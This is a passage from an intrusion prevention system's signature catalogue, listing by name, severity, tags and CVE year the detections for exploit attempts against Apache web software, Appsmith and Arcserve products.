Last changed: sgpkg-ips-1013-5242
Vulnerability: Apache-Jetspeed-Pagemanagementservice-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-Jetspeed-SQL-Injection

About this situation: An attempt to exploit an Apache Jetspeed SQL Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Jetspeed, CVE2016, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Vulnerability: Apache-Jetspeed-SQL-Injection
Description:
Back to top

HTTP_CRL-Apache-Jspwiki-Ajaxpreview-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation JSPWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation JSPWiki, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1506-5242
Last changed: sgpkg-ips-1506-5242
Vulnerability: Apache-Jspwiki-Ajaxpreview-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-Jspwiki-Weblogplugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation JSPWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation JSPWiki, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1514-5242
Last changed: sgpkg-ips-1514-5242
Vulnerability: Apache-Jspwiki-Weblogplugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-Jspwiki-Xhrhtml2markup-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation JSPWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation JSPWiki, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Vulnerability: Apache-Jspwiki-Xhrhtml2markup-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-Kylin-Rest-API-Migratecube-Command-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Kylin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Kylin, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Apache-Kylin-Rest-API-Migratecube-Command-Injection
Description:
Back to top

HTTP_CRL-Apache-Kylin-Runsparksubmit-Command-Injection

About this situation: An attempt to exploit a vulnerability in Apache Kylin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Kylin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1529-5242
Last changed: sgpkg-ips-1532-5242
Vulnerability: Apache-Kylin-Runsparksubmit-Command-Injection
Description:
Back to top

HTTP_CRL-Apache-NiFi-H2-Connection-String-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache NiFi detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Apache NiFi, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Apache-NiFi-H2-Connection-String-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Apache-NiFi-Parameter-Context-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation NiFi detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache NiFi, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1755-5242
Last changed: sgpkg-ips-1755-5242
Vulnerability: Apache-NiFi-Parameter-Context-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-Ofbiz-Authentication-Bypass-CVE-2023-51467

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1670-5242
Last changed: sgpkg-ips-1719-5242
Vulnerability: Apache-Ofbiz-Authentication-Bypass-CVE-2023-51467
Description:
Back to top

HTTP_CRL-Apache-Ofbiz-Createanoncontact-Server-Side-Template-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Vulnerability: Apache-Ofbiz-Createanoncontact-Server-Side-Template-Injection
Description:
Back to top

HTTP_CRL-Apache-Ofbiz-CVE-2021-26295-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1335-5242
Last changed: sgpkg-ips-1349-5242
Vulnerability: Apache-Ofbiz-CVE-2021-26295-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Apache-Ofbiz-CVE-2024-36104-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1750-5242
Last changed: sgpkg-ips-1750-5242
Vulnerability: Apache-Ofbiz-CVE-2024-36104-Directory-Traversal
Description:
Back to top

HTTP_CRL-Apache-Ofbiz-Servicecontext-Xstream-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1224-5242
Vulnerability: Apache-Ofbiz-Servicecontext-Xstream-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Apache-Ofbiz-SSRF-And-Remote-Code-Execution-CVE-2024-45507

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: Apache-Ofbiz-SSRF-And-Remote-Code-Execution-CVE-2024-45507
Description:
Back to top

HTTP_CRL-Apache-Ofbiz-Stream-Contentid-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1267-5242
Vulnerability: Apache-Ofbiz-Stream-Contentid-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195

About this situation: An attempt to exploit a vulnerability in Apache OFBiz detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Linux, Any Hardware, Apache Software Foundation OFBiz, CVE2024, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1773-5242
Last changed: sgpkg-ips-1773-5242
Vulnerability: Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195
Description:
Back to top

HTTP_CRL-Apache-OpenMeetings-Event-Description-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OpenMeetings detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Apache OpenMeetings, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Apache-OpenMeetings-Event-Description-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-OpenMeetings-Nettest-Download-Upload-Size-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OpenMeetings detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache OpenMeetings, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Vulnerability: Apache-OpenMeetings-Nettest-Download-Upload-Size-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Apache-Pluto-Portletv3annotateddemo-Multipartportlet-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Pluto detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Pluto, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: Apache-Pluto-Portletv3annotateddemo-Multipartportlet-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Apache-Shardingsphere-SnakeYaml-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation ShardingSphere detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ShardingSphere, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Apache-Shardingsphere-SnakeYaml-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Apache-SkyWalking-Graphql-Protocol-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Apache SkyWalking detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache SkyWalking, CVE2020, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1288-5242
Vulnerability: Apache-SkyWalking-Graphql-Protocol-SQL-Injection
Description:
Back to top

HTTP_CRL-Apache-Solr-Data-Import-Handler-XML-External-Entity-Expansion-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Solr detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Vulnerability: Apache-Solr-Data-Import-Handler-XML-External-Entity-Information-Disclosure
Description:
Back to top

HTTP_CRL-Apache-Solr-Dataimporthandler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Solr detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1198-5242
Vulnerability: Apache-Solr-Dataimporthandler-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Apache-Solr-Xmlparser-XML-External-Entity-Expansion-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Solr detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1374-5242
Vulnerability: Apache-Solr-Xmlparser-XML-External-Entity-Expansion-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Apache-Spark-Getunixgroups-Command-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Spark detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Spark, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1581-5242
Vulnerability: Apache-Spark-Getunixgroups-Command-Injection
Description:
Back to top

HTTP_CRL-Apache-Struts-2-Command-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts 2 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2011, CVE2012, CVE2013, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1097-5242
Last changed: sgpkg-ips-1097-5242
Vulnerability: Apache-Struts-2-Conversionerrorinterceptor-OGNL-Script-Injection
Apache-Struts-2-Parametersinterceptor-OGNL-Command-Execution
Apache-Struts-Url-And-Anchor-Tag-Includeparams-OGNL-Command-Execution
Apache-Struts-Dynamic-Method-Invocation-Remote-Code-Execution
Apache-Struts-2-Developer-Mode-OGNL-Execution
Description:
Back to top

HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts 2 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2011, CVE2012, CVE2013, CVE2016, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-563-5211
Vulnerability: Apache-Struts-2-Conversionerrorinterceptor-OGNL-Script-Injection
Apache-Struts-2-Parametersinterceptor-OGNL-Command-Execution
Apache-Struts-Url-And-Anchor-Tag-Includeparams-OGNL-Command-Execution
Apache-Struts-Dynamic-Method-Invocation-Remote-Code-Execution
Apache-Struts-2-Developer-Mode-OGNL-Execution
Description:
Back to top

HTTP_CRL-Apache-Struts-2-Struts-1-Plugin-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Vulnerability: Apache-Struts-2-Struts-1-Plugin-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Apache-Struts-Multiple-Classloaders-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2010, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-585-5211
Vulnerability: VMware-Springsource-Spring-Framework-Class.classloader-Remote-Code-Execution
Apache-Struts-Parametersinterceptor-Classloader-Security-Bypass
Apache-Struts-Actionform-Classloader-Security-Bypass
Apache-Struts-Classloader-Manipulation-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Apache-Struts-OGNL-Expressions-DefaultActionMapper-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts 2 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-1396-5242
Vulnerability: Apache-Struts-OGNL-Expressions-DefaultActionMapper-Code-Execution
Description:
Back to top

HTTP_CRL-Apache-Struts-OGNL-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1276-5242
Vulnerability: Apache-Struts-OGNL-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1310-5242
Last changed: sgpkg-ips-1310-5242
Vulnerability: Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530
Description:
Back to top

HTTP_CRL-Apache-Struts-Remote-Java-Execution

About this situation: Detects Remote Java Execution Exploit
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-338-4219
Vulnerability: HTTP-Apache-Struts-Arbitrary-Remote-Java-Execution
Description:
Back to top

HTTP_CRL-Apache-Struts-Remote-Java-Execution-2

About this situation: Detects Remote Java Execution Exploit
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-338-4219
Vulnerability: HTTP-Apache-Struts-Arbitrary-Remote-Java-Execution
Description:
Back to top

HTTP_CRL-Apache-Struts-Remote-Java-Execution-3

About this situation: Detects Remote Java Execution Exploit
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-338-4219
Vulnerability: HTTP-Apache-Struts-Arbitrary-Remote-Java-Execution
Description:
Back to top

HTTP_CRL-Apache-Struts-Rest-Plugin-DMI-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Struts 2 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-770-5211
Vulnerability: Apache-Struts-Rest-Plugin-DMI-Code-Execution
Description:
Back to top

HTTP_CRL-Apache-Struts-Urlvalidator-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts 2 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1503-5242
Vulnerability: Apache-Struts-Urlvalidator-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Apache-Struts-Xsltresult-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts 2 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-761-5211
Vulnerability: Apache-Struts-Xsltresult-File-Inclusion
Description:
Back to top

HTTP_CRL-Apache-Superset-Markdown-Component-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Incubator Superset detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Superset, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Apache-Superset-Markdown-Component-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-Superset-Url-Shortener-Open-Redirect

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Incubator Superset detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Superset, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Vulnerability: Apache-Superset-Url-Shortener-Open-Redirect
Description:
Back to top

HTTP_CRL-Apache-Tapestry-Classpathassetrequesthandler-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Tapestry detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tapestry, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1770-5242
Vulnerability: Apache-Tapestry-Classpathassetrequesthandler-Information-Disclosure
Description:
Back to top

HTTP_CRL-Apache-Tomcat-Directory-Listing-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Tomcat detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-1607-5242
Vulnerability: Apache-Tomcat-Directory-Listing-Information-Disclosure
Description:
Back to top

HTTP_CRL-Apache-Tomcat-HTTP2-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Apache Tomcat detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2019, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1209-5242
Last changed: sgpkg-ips-1209-5242
Vulnerability: Apache-Tomcat-HTTP2-Denial-of-Service
Description:
Back to top

HTTP_CRL-Apache-Tomcat-Maxparametercount-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Tomcat detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Apache-Tomcat-Maxparametercount-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Apache-Tomcat-User-Enumeration

About this situation: An attempt to exploit an Apache Tomcat User Enumeration vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2009, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-726-5211
Vulnerability: Apache-Tomcat-User-Enumeration
Description:
Back to top

HTTP_CRL-Apache-Traffic-Control-Deliveryservice_Request_Comments-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Traffic Control detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation Traffic Control, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Vulnerability: Apache-Traffic-Control-Deliveryservice_Request_Comments-SQL-Injection
Description:
Back to top

HTTP_CRL-Apache-Unomi-CVE-2020-13942-RCE

About this situation: An attempt to exploit a vulnerability in Apache Unomi detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Unomi, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1300-5242
Vulnerability: Apache-Unomi-CVE-2020-13942-RCE
Description:
Back to top

HTTP_CRL-Apache-Win32-Pipe-Metacharacter-Attack

About this situation: Apache Win32 Pipe Metacharacter Attack
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, Apache, CVE2002, Windows not specific, Apache not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1183-5242
Vulnerability: HTTP-Apache-Win32-Pipe-Metacharacter-Attack
Description:
Back to top

HTTP_CRL-Apache-Zeppelin-WebsocketEventFactory-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Zeppelin detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Zeppelin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1557-5242
Vulnerability: Apache-Zeppelin-WebsocketEventFactory-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Appsmith-RCE-CVE-2024-55964

About this situation: An attempt to exploit a vulnerability in Appsmith detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Appsmith, CVE2024, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Appsmith-RCE-CVE-2024-55964
Description:
Back to top

HTTP_CRL-ARCserve-D2D-Getnews-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in CA ARCserve D2D detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CA ARCserve D2D, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1308-5242
Vulnerability: ARCserve-D2D-Getnews-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Arcserve-Unified-Data-Protection-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Arcserve Unified Data Protection, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Arcserve-Unified-Data-Protection-Directory-Traversal
Description:
Back to top

HTTP_CRL-ARMBot-Botnet

About this situation: ARMBot Botnet traffic has been detected
